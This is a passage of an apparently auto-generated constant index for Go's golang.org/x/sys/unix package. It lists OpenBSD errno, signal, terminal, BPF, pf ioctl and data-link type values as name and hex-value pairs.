= 0x7a constant TIOCUCNTL_SBRK (line 1582) | TIOCUCNTL_SBRK = 0x7b constant TOSTOP (line 1583) | TOSTOP = 0x400000 constant UTIME_NOW (line 1584) | UTIME_NOW = -0x2 constant UTIME_OMIT (line 1585) | UTIME_OMIT = -0x1 constant VDISCARD (line 1586) | VDISCARD = 0xf constant VDSUSP (line 1587) | VDSUSP = 0xb constant VEOF (line 1588) | VEOF = 0x0 constant VEOL (line 1589) | VEOL = 0x1 constant VEOL2 (line 1590) | VEOL2 = 0x2 constant VERASE (line 1591) | VERASE = 0x3 constant VINTR (line 1592) | VINTR = 0x8 constant VKILL (line 1593) | VKILL = 0x5 constant VLNEXT (line 1594) | VLNEXT = 0xe constant VMIN (line 1595) | VMIN = 0x10 constant VM_ANONMIN (line 1596) | VM_ANONMIN = 0x7 constant VM_LOADAVG (line 1597) | VM_LOADAVG = 0x2 constant VM_MALLOC_CONF (line 1598) | VM_MALLOC_CONF = 0xc constant VM_MAXID (line 1599) | VM_MAXID = 0xd constant VM_MAXSLP (line 1600) | VM_MAXSLP = 0xa constant VM_METER (line 1601) | VM_METER = 0x1 constant VM_NKMEMPAGES (line 1602) | VM_NKMEMPAGES = 0x6 constant VM_PSSTRINGS (line 1603) | VM_PSSTRINGS = 0x3 constant VM_SWAPENCRYPT (line 1604) | VM_SWAPENCRYPT = 0x5 constant VM_USPACE (line 1605) | VM_USPACE = 0xb constant VM_UVMEXP (line 1606) | VM_UVMEXP = 0x4 constant VM_VNODEMIN (line 1607) | VM_VNODEMIN = 0x9 constant VM_VTEXTMIN (line 1608) | VM_VTEXTMIN = 0x8 constant VQUIT (line 1609) | VQUIT = 0x9 constant VREPRINT (line 1610) | VREPRINT = 0x6 constant VSTART (line 1611) | VSTART = 0xc constant VSTATUS (line 1612) | VSTATUS = 0x12 constant VSTOP (line 1613) | VSTOP = 0xd constant VSUSP (line 1614) | VSUSP = 0xa constant VTIME (line 1615) | VTIME = 0x11 constant VWERASE (line 1616) | VWERASE = 0x4 constant WALTSIG (line 1617) | WALTSIG = 0x4 constant WCONTINUED (line 1618) | WCONTINUED = 0x8 constant WCOREFLAG (line 1619) | WCOREFLAG = 0x80 constant WNOHANG (line 1620) | WNOHANG = 0x1 constant WUNTRACED (line 1621) | WUNTRACED = 0x2 constant XCASE (line 1622) | XCASE = 0x1000000 constant E2BIG (line 1627) | E2BIG = syscall.Errno(0x7) constant EACCES (line 1628) | EACCES = syscall.Errno(0xd) constant EADDRINUSE (line 1629) | EADDRINUSE = syscall.Errno(0x30) constant EADDRNOTAVAIL (line 1630) | EADDRNOTAVAIL = syscall.Errno(0x31) constant EAFNOSUPPORT (line 1631) | EAFNOSUPPORT = syscall.Errno(0x2f) constant EAGAIN (line 1632) | EAGAIN = syscall.Errno(0x23) constant EALREADY (line 1633) | EALREADY = syscall.Errno(0x25) constant EAUTH (line 1634) | EAUTH = syscall.Errno(0x50) constant EBADF (line 1635) | EBADF = syscall.Errno(0x9) constant EBADMSG (line 1636) | EBADMSG = syscall.Errno(0x5c) constant EBADRPC (line 1637) | EBADRPC = syscall.Errno(0x48) constant EBUSY (line 1638) | EBUSY = syscall.Errno(0x10) constant ECANCELED (line 1639) | ECANCELED = syscall.Errno(0x58) constant ECHILD (line 1640) | ECHILD = syscall.Errno(0xa) constant ECONNABORTED (line 1641) | ECONNABORTED = syscall.Errno(0x35) constant ECONNREFUSED (line 1642) | ECONNREFUSED = syscall.Errno(0x3d) constant ECONNRESET (line 1643) | ECONNRESET = syscall.Errno(0x36) constant EDEADLK (line 1644) | EDEADLK = syscall.Errno(0xb) constant EDESTADDRREQ (line 1645) | EDESTADDRREQ = syscall.Errno(0x27) constant EDOM (line 1646) | EDOM = syscall.Errno(0x21) constant EDQUOT (line 1647) | EDQUOT = syscall.Errno(0x45) constant EEXIST (line 1648) | EEXIST = syscall.Errno(0x11) constant EFAULT (line 1649) | EFAULT = syscall.Errno(0xe) constant EFBIG (line 1650) | EFBIG = syscall.Errno(0x1b) constant EFTYPE (line 1651) | EFTYPE = syscall.Errno(0x4f) constant EHOSTDOWN (line 1652) | EHOSTDOWN = syscall.Errno(0x40) constant EHOSTUNREACH (line 1653) | EHOSTUNREACH = syscall.Errno(0x41) constant EIDRM (line 1654) | EIDRM = syscall.Errno(0x59) constant EILSEQ (line 1655) | EILSEQ = syscall.Errno(0x54) constant EINPROGRESS (line 1656) | EINPROGRESS = syscall.Errno(0x24) constant EINTR (line 1657) | EINTR = syscall.Errno(0x4) constant EINVAL (line 1658) | EINVAL = syscall.Errno(0x16) constant EIO (line 1659) | EIO = syscall.Errno(0x5) constant EIPSEC (line 1660) | EIPSEC = syscall.Errno(0x52) constant EISCONN (line 1661) | EISCONN = syscall.Errno(0x38) constant EISDIR (line 1662) | EISDIR = syscall.Errno(0x15) constant ELAST (line 1663) | ELAST = syscall.Errno(0x5f) constant ELOOP (line 1664) | ELOOP = syscall.Errno(0x3e) constant EMEDIUMTYPE (line 1665) | EMEDIUMTYPE = syscall.Errno(0x56) constant EMFILE (line 1666) | EMFILE = syscall.Errno(0x18) constant EMLINK (line 1667) | EMLINK = syscall.Errno(0x1f) constant EMSGSIZE (line 1668) | EMSGSIZE = syscall.Errno(0x28) constant ENAMETOOLONG (line 1669) | ENAMETOOLONG = syscall.Errno(0x3f) constant ENEEDAUTH (line 1670) | ENEEDAUTH = syscall.Errno(0x51) constant ENETDOWN (line 1671) | ENETDOWN = syscall.Errno(0x32) constant ENETRESET (line 1672) | ENETRESET = syscall.Errno(0x34) constant ENETUNREACH (line 1673) | ENETUNREACH = syscall.Errno(0x33) constant ENFILE (line 1674) | ENFILE = syscall.Errno(0x17) constant ENOATTR (line 1675) | ENOATTR = syscall.Errno(0x53) constant ENOBUFS (line 1676) | ENOBUFS = syscall.Errno(0x37) constant ENODEV (line 1677) | ENODEV = syscall.Errno(0x13) constant ENOENT (line 1678) | ENOENT = syscall.Errno(0x2) constant ENOEXEC (line 1679) | ENOEXEC = syscall.Errno(0x8) constant ENOLCK (line 1680) | ENOLCK = syscall.Errno(0x4d) constant ENOMEDIUM (line 1681) | ENOMEDIUM = syscall.Errno(0x55) constant ENOMEM (line 1682) | ENOMEM = syscall.Errno(0xc) constant ENOMSG (line 1683) | ENOMSG = syscall.Errno(0x5a) constant ENOPROTOOPT (line 1684) | ENOPROTOOPT = syscall.Errno(0x2a) constant ENOSPC (line 1685) | ENOSPC = syscall.Errno(0x1c) constant ENOSYS (line 1686) | ENOSYS = syscall.Errno(0x4e) constant ENOTBLK (line 1687) | ENOTBLK = syscall.Errno(0xf) constant ENOTCONN (line 1688) | ENOTCONN = syscall.Errno(0x39) constant ENOTDIR (line 1689) | ENOTDIR = syscall.Errno(0x14) constant ENOTEMPTY (line 1690) | ENOTEMPTY = syscall.Errno(0x42) constant ENOTRECOVERABLE (line 1691) | ENOTRECOVERABLE = syscall.Errno(0x5d) constant ENOTSOCK (line 1692) | ENOTSOCK = syscall.Errno(0x26) constant ENOTSUP (line 1693) | ENOTSUP = syscall.Errno(0x5b) constant ENOTTY (line 1694) | ENOTTY = syscall.Errno(0x19) constant ENXIO (line 1695) | ENXIO = syscall.Errno(0x6) constant EOPNOTSUPP (line 1696) | EOPNOTSUPP = syscall.Errno(0x2d) constant EOVERFLOW (line 1697) | EOVERFLOW = syscall.Errno(0x57) constant EOWNERDEAD (line 1698) | EOWNERDEAD = syscall.Errno(0x5e) constant EPERM (line 1699) | EPERM = syscall.Errno(0x1) constant EPFNOSUPPORT (line 1700) | EPFNOSUPPORT = syscall.Errno(0x2e) constant EPIPE (line 1701) | EPIPE = syscall.Errno(0x20) constant EPROCLIM (line 1702) | EPROCLIM = syscall.Errno(0x43) constant EPROCUNAVAIL (line 1703) | EPROCUNAVAIL = syscall.Errno(0x4c) constant EPROGMISMATCH (line 1704) | EPROGMISMATCH = syscall.Errno(0x4b) constant EPROGUNAVAIL (line 1705) | EPROGUNAVAIL = syscall.Errno(0x4a) constant EPROTO (line 1706) | EPROTO = syscall.Errno(0x5f) constant EPROTONOSUPPORT (line 1707) | EPROTONOSUPPORT = syscall.Errno(0x2b) constant EPROTOTYPE (line 1708) | EPROTOTYPE = syscall.Errno(0x29) constant ERANGE (line 1709) | ERANGE = syscall.Errno(0x22) constant EREMOTE (line 1710) | EREMOTE = syscall.Errno(0x47) constant EROFS (line 1711) | EROFS = syscall.Errno(0x1e) constant ERPCMISMATCH (line 1712) | ERPCMISMATCH = syscall.Errno(0x49) constant ESHUTDOWN (line 1713) | ESHUTDOWN = syscall.Errno(0x3a) constant ESOCKTNOSUPPORT (line 1714) | ESOCKTNOSUPPORT = syscall.Errno(0x2c) constant ESPIPE (line 1715) | ESPIPE = syscall.Errno(0x1d) constant ESRCH (line 1716) | ESRCH = syscall.Errno(0x3) constant ESTALE (line 1717) | ESTALE = syscall.Errno(0x46) constant ETIMEDOUT (line 1718) | ETIMEDOUT = syscall.Errno(0x3c) constant ETOOMANYREFS (line 1719) | ETOOMANYREFS = syscall.Errno(0x3b) constant ETXTBSY (line 1720) | ETXTBSY = syscall.Errno(0x1a) constant EUSERS (line 1721) | EUSERS = syscall.Errno(0x44) constant EWOULDBLOCK (line 1722) | EWOULDBLOCK = syscall.Errno(0x23) constant EXDEV (line 1723) | EXDEV = syscall.Errno(0x12) constant SIGABRT (line 1728) | SIGABRT = syscall.Signal(0x6) constant SIGALRM (line 1729) | SIGALRM = syscall.Signal(0xe) constant SIGBUS (line 1730) | SIGBUS = syscall.Signal(0xa) constant SIGCHLD (line 1731) | SIGCHLD = syscall.Signal(0x14) constant SIGCONT (line 1732) | SIGCONT = syscall.Signal(0x13) constant SIGEMT (line 1733) | SIGEMT = syscall.Signal(0x7) constant SIGFPE (line 1734) | SIGFPE = syscall.Signal(0x8) constant SIGHUP (line 1735) | SIGHUP = syscall.Signal(0x1) constant SIGILL (line 1736) | SIGILL = syscall.Signal(0x4) constant SIGINFO (line 1737) | SIGINFO = syscall.Signal(0x1d) constant SIGINT (line 1738) | SIGINT = syscall.Signal(0x2) constant SIGIO (line 1739) | SIGIO = syscall.Signal(0x17) constant SIGIOT (line 1740) | SIGIOT = syscall.Signal(0x6) constant SIGKILL (line 1741) | SIGKILL = syscall.Signal(0x9) constant SIGPIPE (line 1742) | SIGPIPE = syscall.Signal(0xd) constant SIGPROF (line 1743) | SIGPROF = syscall.Signal(0x1b) constant SIGQUIT (line 1744) | SIGQUIT = syscall.Signal(0x3) constant SIGSEGV (line 1745) | SIGSEGV = syscall.Signal(0xb) constant SIGSTOP (line 1746) | SIGSTOP = syscall.Signal(0x11) constant SIGSYS (line 1747) | SIGSYS = syscall.Signal(0xc) constant SIGTERM (line 1748) | SIGTERM = syscall.Signal(0xf) constant SIGTHR (line 1749) | SIGTHR = syscall.Signal(0x20) constant SIGTRAP (line 1750) | SIGTRAP = syscall.Signal(0x5) constant SIGTSTP (line 1751) | SIGTSTP = syscall.Signal(0x12) constant SIGTTIN (line 1752) | SIGTTIN = syscall.Signal(0x15) constant SIGTTOU (line 1753) | SIGTTOU = syscall.Signal(0x16) constant SIGURG (line 1754) | SIGURG = syscall.Signal(0x10) constant SIGUSR1 (line 1755) | SIGUSR1 = syscall.Signal(0x1e) constant SIGUSR2 (line 1756) | SIGUSR2 = syscall.Signal(0x1f) constant SIGVTALRM (line 1757) | SIGVTALRM = syscall.Signal(0x1a) constant SIGWINCH (line 1758) | SIGWINCH = syscall.Signal(0x1c) constant SIGXCPU (line 1759) | SIGXCPU = syscall.Signal(0x18) constant SIGXFSZ (line 1760) | SIGXFSZ = syscall.Signal(0x19) FILE: vendor/golang.org/x/sys/unix/zerrors_openbsd_amd64.go constant AF_APPLETALK (line 14) | AF_APPLETALK = 0x10 constant AF_BLUETOOTH (line 15) | AF_BLUETOOTH = 0x20 constant AF_CCITT (line 16) | AF_CCITT = 0xa constant AF_CHAOS (line 17) | AF_CHAOS = 0x5 constant AF_CNT (line 18) | AF_CNT = 0x15 constant AF_COIP (line 19) | AF_COIP = 0x14 constant AF_DATAKIT (line 20) | AF_DATAKIT = 0x9 constant AF_DECnet (line 21) | AF_DECnet = 0xc constant AF_DLI (line 22) | AF_DLI = 0xd constant AF_E164 (line 23) | AF_E164 = 0x1a constant AF_ECMA (line 24) | AF_ECMA = 0x8 constant AF_ENCAP (line 25) | AF_ENCAP = 0x1c constant AF_HYLINK (line 26) | AF_HYLINK = 0xf constant AF_IMPLINK (line 27) | AF_IMPLINK = 0x3 constant AF_INET (line 28) | AF_INET = 0x2 constant AF_INET6 (line 29) | AF_INET6 = 0x18 constant AF_IPX (line 30) | AF_IPX = 0x17 constant AF_ISDN (line 31) | AF_ISDN = 0x1a constant AF_ISO (line 32) | AF_ISO = 0x7 constant AF_KEY (line 33) | AF_KEY = 0x1e constant AF_LAT (line 34) | AF_LAT = 0xe constant AF_LINK (line 35) | AF_LINK = 0x12 constant AF_LOCAL (line 36) | AF_LOCAL = 0x1 constant AF_MAX (line 37) | AF_MAX = 0x24 constant AF_MPLS (line 38) | AF_MPLS = 0x21 constant AF_NATM (line 39) | AF_NATM = 0x1b constant AF_NS (line 40) | AF_NS = 0x6 constant AF_OSI (line 41) | AF_OSI = 0x7 constant AF_PUP (line 42) | AF_PUP = 0x4 constant AF_ROUTE (line 43) | AF_ROUTE = 0x11 constant AF_SIP (line 44) | AF_SIP = 0x1d constant AF_SNA (line 45) | AF_SNA = 0xb constant AF_UNIX (line 46) | AF_UNIX = 0x1 constant AF_UNSPEC (line 47) | AF_UNSPEC = 0x0 constant ALTWERASE (line 48) | ALTWERASE = 0x200 constant ARPHRD_ETHER (line 49) | ARPHRD_ETHER = 0x1 constant ARPHRD_FRELAY (line 50) | ARPHRD_FRELAY = 0xf constant ARPHRD_IEEE1394 (line 51) | ARPHRD_IEEE1394 = 0x18 constant ARPHRD_IEEE802 (line 52) | ARPHRD_IEEE802 = 0x6 constant B0 (line 53) | B0 = 0x0 constant B110 (line 54) | B110 = 0x6e constant B115200 (line 55) | B115200 = 0x1c200 constant B1200 (line 56) | B1200 = 0x4b0 constant B134 (line 57) | B134 = 0x86 constant B14400 (line 58) | B14400 = 0x3840 constant B150 (line 59) | B150 = 0x96 constant B1800 (line 60) | B1800 = 0x708 constant B19200 (line 61) | B19200 = 0x4b00 constant B200 (line 62) | B200 = 0xc8 constant B230400 (line 63) | B230400 = 0x38400 constant B2400 (line 64) | B2400 = 0x960 constant B28800 (line 65) | B28800 = 0x7080 constant B300 (line 66) | B300 = 0x12c constant B38400 (line 67) | B38400 = 0x9600 constant B4800 (line 68) | B4800 = 0x12c0 constant B50 (line 69) | B50 = 0x32 constant B57600 (line 70) | B57600 = 0xe100 constant B600 (line 71) | B600 = 0x258 constant B7200 (line 72) | B7200 = 0x1c20 constant B75 (line 73) | B75 = 0x4b constant B76800 (line 74) | B76800 = 0x12c00 constant B9600 (line 75) | B9600 = 0x2580 constant BIOCFLUSH (line 76) | BIOCFLUSH = 0x20004268 constant BIOCGBLEN (line 77) | BIOCGBLEN = 0x40044266 constant BIOCGDIRFILT (line 78) | BIOCGDIRFILT = 0x4004427c constant BIOCGDLT (line 79) | BIOCGDLT = 0x4004426a constant BIOCGDLTLIST (line 80) | BIOCGDLTLIST = 0xc010427b constant BIOCGETIF (line 81) | BIOCGETIF = 0x4020426b constant BIOCGFILDROP (line 82) | BIOCGFILDROP = 0x40044278 constant BIOCGHDRCMPLT (line 83) | BIOCGHDRCMPLT = 0x40044274 constant BIOCGRSIG (line 84) | BIOCGRSIG = 0x40044273 constant BIOCGRTIMEOUT (line 85) | BIOCGRTIMEOUT = 0x4010426e constant BIOCGSTATS (line 86) | BIOCGSTATS = 0x4008426f constant BIOCIMMEDIATE (line 87) | BIOCIMMEDIATE = 0x80044270 constant BIOCLOCK (line 88) | BIOCLOCK = 0x20004276 constant BIOCPROMISC (line 89) | BIOCPROMISC = 0x20004269 constant BIOCSBLEN (line 90) | BIOCSBLEN = 0xc0044266 constant BIOCSDIRFILT (line 91) | BIOCSDIRFILT = 0x8004427d constant BIOCSDLT (line 92) | BIOCSDLT = 0x8004427a constant BIOCSETF (line 93) | BIOCSETF = 0x80104267 constant BIOCSETIF (line 94) | BIOCSETIF = 0x8020426c constant BIOCSETWF (line 95) | BIOCSETWF = 0x80104277 constant BIOCSFILDROP (line 96) | BIOCSFILDROP = 0x80044279 constant BIOCSHDRCMPLT (line 97) | BIOCSHDRCMPLT = 0x80044275 constant BIOCSRSIG (line 98) | BIOCSRSIG = 0x80044272 constant BIOCSRTIMEOUT (line 99) | BIOCSRTIMEOUT = 0x8010426d constant BIOCVERSION (line 100) | BIOCVERSION = 0x40044271 constant BPF_A (line 101) | BPF_A = 0x10 constant BPF_ABS (line 102) | BPF_ABS = 0x20 constant BPF_ADD (line 103) | BPF_ADD = 0x0 constant BPF_ALIGNMENT (line 104) | BPF_ALIGNMENT = 0x4 constant BPF_ALU (line 105) | BPF_ALU = 0x4 constant BPF_AND (line 106) | BPF_AND = 0x50 constant BPF_B (line 107) | BPF_B = 0x10 constant BPF_DIRECTION_IN (line 108) | BPF_DIRECTION_IN = 0x1 constant BPF_DIRECTION_OUT (line 109) | BPF_DIRECTION_OUT = 0x2 constant BPF_DIV (line 110) | BPF_DIV = 0x30 constant BPF_FILDROP_CAPTURE (line 111) | BPF_FILDROP_CAPTURE = 0x1 constant BPF_FILDROP_DROP (line 112) | BPF_FILDROP_DROP = 0x2 constant BPF_FILDROP_PASS (line 113) | BPF_FILDROP_PASS = 0x0 constant BPF_F_DIR_IN (line 114) | BPF_F_DIR_IN = 0x10 constant BPF_F_DIR_MASK (line 115) | BPF_F_DIR_MASK = 0x30 constant BPF_F_DIR_OUT (line 116) | BPF_F_DIR_OUT = 0x20 constant BPF_F_DIR_SHIFT (line 117) | BPF_F_DIR_SHIFT = 0x4 constant BPF_F_FLOWID (line 118) | BPF_F_FLOWID = 0x8 constant BPF_F_PRI_MASK (line 119) | BPF_F_PRI_MASK = 0x7 constant BPF_H (line 120) | BPF_H = 0x8 constant BPF_IMM (line 121) | BPF_IMM = 0x0 constant BPF_IND (line 122) | BPF_IND = 0x40 constant BPF_JA (line 123) | BPF_JA = 0x0 constant BPF_JEQ (line 124) | BPF_JEQ = 0x10 constant BPF_JGE (line 125) | BPF_JGE = 0x30 constant BPF_JGT (line 126) | BPF_JGT = 0x20 constant BPF_JMP (line 127) | BPF_JMP = 0x5 constant BPF_JSET (line 128) | BPF_JSET = 0x40 constant BPF_K (line 129) | BPF_K = 0x0 constant BPF_LD (line 130) | BPF_LD = 0x0 constant BPF_LDX (line 131) | BPF_LDX = 0x1 constant BPF_LEN (line 132) | BPF_LEN = 0x80 constant BPF_LSH (line 133) | BPF_LSH = 0x60 constant BPF_MAJOR_VERSION (line 134) | BPF_MAJOR_VERSION = 0x1 constant BPF_MAXBUFSIZE (line 135) | BPF_MAXBUFSIZE = 0x200000 constant BPF_MAXINSNS (line 136) | BPF_MAXINSNS = 0x200 constant BPF_MEM (line 137) | BPF_MEM = 0x60 constant BPF_MEMWORDS (line 138) | BPF_MEMWORDS = 0x10 constant BPF_MINBUFSIZE (line 139) | BPF_MINBUFSIZE = 0x20 constant BPF_MINOR_VERSION (line 140) | BPF_MINOR_VERSION = 0x1 constant BPF_MISC (line 141) | BPF_MISC = 0x7 constant BPF_MSH (line 142) | BPF_MSH = 0xa0 constant BPF_MUL (line 143) | BPF_MUL = 0x20 constant BPF_NEG (line 144) | BPF_NEG = 0x80 constant BPF_OR (line 145) | BPF_OR = 0x40 constant BPF_RELEASE (line 146) | BPF_RELEASE = 0x30bb6 constant BPF_RET (line 147) | BPF_RET = 0x6 constant BPF_RND (line 148) | BPF_RND = 0xc0 constant BPF_RSH (line 149) | BPF_RSH = 0x70 constant BPF_ST (line 150) | BPF_ST = 0x2 constant BPF_STX (line 151) | BPF_STX = 0x3 constant BPF_SUB (line 152) | BPF_SUB = 0x10 constant BPF_TAX (line 153) | BPF_TAX = 0x0 constant BPF_TXA (line 154) | BPF_TXA = 0x80 constant BPF_W (line 155) | BPF_W = 0x0 constant BPF_X (line 156) | BPF_X = 0x8 constant BRKINT (line 157) | BRKINT = 0x2 constant CFLUSH (line 158) | CFLUSH = 0xf constant CLOCAL (line 159) | CLOCAL = 0x8000 constant CLOCK_BOOTTIME (line 160) | CLOCK_BOOTTIME = 0x6 constant CLOCK_MONOTONIC (line 161) | CLOCK_MONOTONIC = 0x3 constant CLOCK_PROCESS_CPUTIME_ID (line 162) | CLOCK_PROCESS_CPUTIME_ID = 0x2 constant CLOCK_REALTIME (line 163) | CLOCK_REALTIME = 0x0 constant CLOCK_THREAD_CPUTIME_ID (line 164) | CLOCK_THREAD_CPUTIME_ID = 0x4 constant CLOCK_UPTIME (line 165) | CLOCK_UPTIME = 0x5 constant CPUSTATES (line 166) | CPUSTATES = 0x6 constant CP_IDLE (line 167) | CP_IDLE = 0x5 constant CP_INTR (line 168) | CP_INTR = 0x4 constant CP_NICE (line 169) | CP_NICE = 0x1 constant CP_SPIN (line 170) | CP_SPIN = 0x3 constant CP_SYS (line 171) | CP_SYS = 0x2 constant CP_USER (line 172) | CP_USER = 0x0 constant CREAD (line 173) | CREAD = 0x800 constant CRTSCTS (line 174) | CRTSCTS = 0x10000 constant CS5 (line 175) | CS5 = 0x0 constant CS6 (line 176) | CS6 = 0x100 constant CS7 (line 177) | CS7 = 0x200 constant CS8 (line 178) | CS8 = 0x300 constant CSIZE (line 179) | CSIZE = 0x300 constant CSTART (line 180) | CSTART = 0x11 constant CSTATUS (line 181) | CSTATUS = 0xff constant CSTOP (line 182) | CSTOP = 0x13 constant CSTOPB (line 183) | CSTOPB = 0x400 constant CSUSP (line 184) | CSUSP = 0x1a constant CTL_HW (line 185) | CTL_HW = 0x6 constant CTL_KERN (line 186) | CTL_KERN = 0x1 constant CTL_MAXNAME (line 187) | CTL_MAXNAME = 0xc constant CTL_NET (line 188) | CTL_NET = 0x4 constant DIOCADDQUEUE (line 189) | DIOCADDQUEUE = 0xc110445d constant DIOCADDRULE (line 190) | DIOCADDRULE = 0xcd604404 constant DIOCADDSTATE (line 191) | DIOCADDSTATE = 0xc1084425 constant DIOCCHANGERULE (line 192) | DIOCCHANGERULE = 0xcd60441a constant DIOCCLRIFFLAG (line 193) | DIOCCLRIFFLAG = 0xc028445a constant DIOCCLRSRCNODES (line 194) | DIOCCLRSRCNODES = 0x20004455 constant DIOCCLRSTATES (line 195) | DIOCCLRSTATES = 0xc0e04412 constant DIOCCLRSTATUS (line 196) | DIOCCLRSTATUS = 0xc0284416 constant DIOCGETLIMIT (line 197) | DIOCGETLIMIT = 0xc0084427 constant DIOCGETQSTATS (line 198) | DIOCGETQSTATS = 0xc1204460 constant DIOCGETQUEUE (line 199) | DIOCGETQUEUE = 0xc110445f constant DIOCGETQUEUES (line 200) | DIOCGETQUEUES = 0xc110445e constant DIOCGETRULE (line 201) | DIOCGETRULE = 0xcd604407 constant DIOCGETRULES (line 202) | DIOCGETRULES = 0xcd604406 constant DIOCGETRULESET (line 203) | DIOCGETRULESET = 0xc444443b constant DIOCGETRULESETS (line 204) | DIOCGETRULESETS = 0xc444443a constant DIOCGETSRCNODES (line 205) | DIOCGETSRCNODES = 0xc0104454 constant DIOCGETSTATE (line 206) | DIOCGETSTATE = 0xc1084413 constant DIOCGETSTATES (line 207) | DIOCGETSTATES = 0xc0104419 constant DIOCGETSTATUS (line 208) | DIOCGETSTATUS = 0xc1e84415 constant DIOCGETSYNFLWATS (line 209) | DIOCGETSYNFLWATS = 0xc0084463 constant DIOCGETTIMEOUT (line 210) | DIOCGETTIMEOUT = 0xc008441e constant DIOCIGETIFACES (line 211) | DIOCIGETIFACES = 0xc0284457 constant DIOCKILLSRCNODES (line 212) | DIOCKILLSRCNODES = 0xc080445b constant DIOCKILLSTATES (line 213) | DIOCKILLSTATES = 0xc0e04429 constant DIOCNATLOOK (line 214) | DIOCNATLOOK = 0xc0504417 constant DIOCOSFPADD (line 215) | DIOCOSFPADD = 0xc088444f constant DIOCOSFPFLUSH (line 216) | DIOCOSFPFLUSH = 0x2000444e constant DIOCOSFPGET (line 217) | DIOCOSFPGET = 0xc0884450 constant DIOCRADDADDRS (line 218) | DIOCRADDADDRS = 0xc4504443 constant DIOCRADDTABLES (line 219) | DIOCRADDTABLES = 0xc450443d constant DIOCRCLRADDRS (line 220) | DIOCRCLRADDRS = 0xc4504442 constant DIOCRCLRASTATS (line 221) | DIOCRCLRASTATS = 0xc4504448 constant DIOCRCLRTABLES (line 222) | DIOCRCLRTABLES = 0xc450443c constant DIOCRCLRTSTATS (line 223) | DIOCRCLRTSTATS = 0xc4504441 constant DIOCRDELADDRS (line 224) | DIOCRDELADDRS = 0xc4504444 constant DIOCRDELTABLES (line 225) | DIOCRDELTABLES = 0xc450443e constant DIOCRGETADDRS (line 226) | DIOCRGETADDRS = 0xc4504446 constant DIOCRGETASTATS (line 227) | DIOCRGETASTATS = 0xc4504447 constant DIOCRGETTABLES (line 228) | DIOCRGETTABLES = 0xc450443f constant DIOCRGETTSTATS (line 229) | DIOCRGETTSTATS = 0xc4504440 constant DIOCRINADEFINE (line 230) | DIOCRINADEFINE = 0xc450444d constant DIOCRSETADDRS (line 231) | DIOCRSETADDRS = 0xc4504445 constant DIOCRSETTFLAGS (line 232) | DIOCRSETTFLAGS = 0xc450444a constant DIOCRTSTADDRS (line 233) | DIOCRTSTADDRS = 0xc4504449 constant DIOCSETDEBUG (line 234) | DIOCSETDEBUG = 0xc0044418 constant DIOCSETHOSTID (line 235) | DIOCSETHOSTID = 0xc0044456 constant DIOCSETIFFLAG (line 236) | DIOCSETIFFLAG = 0xc0284459 constant DIOCSETLIMIT (line 237) | DIOCSETLIMIT = 0xc0084428 constant DIOCSETREASS (line 238) | DIOCSETREASS = 0xc004445c constant DIOCSETSTATUSIF (line 239) | DIOCSETSTATUSIF = 0xc0284414 constant DIOCSETSYNCOOKIES (line 240) | DIOCSETSYNCOOKIES = 0xc0014462 constant DIOCSETSYNFLWATS (line 241) | DIOCSETSYNFLWATS = 0xc0084461 constant DIOCSETTIMEOUT (line 242) | DIOCSETTIMEOUT = 0xc008441d constant DIOCSTART (line 243) | DIOCSTART = 0x20004401 constant DIOCSTOP (line 244) | DIOCSTOP = 0x20004402 constant DIOCXBEGIN (line 245) | DIOCXBEGIN = 0xc0104451 constant DIOCXCOMMIT (line 246) | DIOCXCOMMIT = 0xc0104452 constant DIOCXROLLBACK (line 247) | DIOCXROLLBACK = 0xc0104453 constant DLT_ARCNET (line 248) | DLT_ARCNET = 0x7 constant DLT_ATM_RFC1483 (line 249) | DLT_ATM_RFC1483 = 0xb constant DLT_AX25 (line 250) | DLT_AX25 = 0x3 constant DLT_CHAOS (line 251) | DLT_CHAOS = 0x5 constant DLT_C_HDLC (line 252) | DLT_C_HDLC = 0x68 constant DLT_EN10MB (line 253) | DLT_EN10MB = 0x1 constant DLT_EN3MB (line 254) | DLT_EN3MB = 0x2 constant DLT_ENC (line 255) | DLT_ENC = 0xd constant DLT_FDDI (line 256) | DLT_FDDI = 0xa constant DLT_IEEE802 (line 257) | DLT_IEEE802 = 0x6 constant DLT_IEEE802_11 (line 258) | DLT_IEEE802_11 = 0x69 constant DLT_IEEE802_11_RADIO (line 259) | DLT_IEEE802_11_RADIO = 0x7f constant DLT_LOOP (line 260) | DLT_LOOP = 0xc constant DLT_MPLS (line 261) | DLT_MPLS = 0xdb constant DLT_NULL (line 262) | DLT_NULL = 0x0 constant DLT_OPENFLOW (line 263) | DLT_OPENFLOW = 0x10b constant DLT_PFLOG (line 264) | DLT_PFLOG = 0x75 constant DLT_PFSYNC (line 265) | DLT_PFSYNC = 0x12 constant DLT_PPP (line 266) | DLT_PPP = 0x9 constant DLT_PPP_BSDOS (line 267) | DLT_PPP_BSDOS = 0x10 constant DLT_PPP_ETHER (line 268) | DLT_PPP_ETHER = 0x33 constant DLT_PPP_SERIAL (line 269) | DLT_PPP_SERIAL = 0x32 constant DLT_PRONET (line 270) | DLT_PRONET = 0x4 constant DLT_RAW (line 271) | DLT_RAW = 0xe constant DLT_SLIP (line 272) | DLT_SLIP = 0x8 constant DLT_SLIP_BSDOS (line 273) | DLT_SLIP_BSDOS = 0xf constant DLT_USBPCAP (line 274) | DLT_USBPCAP = 0xf9 constant DLT_USER0 (line 275) | DLT_USER0 = 0x93 constant DLT_USER1 (line 276) | DLT_USER1 = 0x94 constant DLT_USER10 (line 277) | DLT_USER10 = 0x9d constant DLT_USER11 (line 278) | DLT_USER11 = 0x9e constant DLT_USER12 (line 279) | DLT_USER12 = 0x9f constant DLT_USER13 (line 280) | DLT_USER13 = 0xa0 constant DLT_USER14 (line 281) | DLT_USER14 = 0xa1 constant DLT_USER15 (line 282) | DLT_USER15 = 0xa2 constant DLT_USER2 (line 283) | DLT_USER2 = 0x95 constant DLT_USER3 (line 284) | DLT_USER3 = 0x96 constant DLT_USER4 (line 285) | DLT_USER4 = 0x97 constant DLT_USER5 (line 286) | DLT_USER5 = 0x98 constant DLT_USER6 (line 287) | DLT_USER6 = 0x99 constant DLT_USER7 (line 288) | DLT_USER7 = 0x9a constant DLT_USER8 (line 289) | DLT_USER8 = 0x9b constant DLT_USER9 (line 290) | DLT_USER9 = 0x9c constant DT_BLK (line 291) | DT_BLK = 0x6 constant DT_CHR (line 292) | DT_CHR = 0x2 constant DT_DIR (line 293) | DT_DIR = 0x4 constant DT_FIFO (line 294) | DT_FIFO = 0x1 constant DT_LNK (line 295) | DT_LNK = 0xa constant DT_REG (line 296) | DT_REG = 0x8 constant DT_SOCK (line 297) | DT_SOCK = 0xc constant DT_UNKNOWN (line 298) | 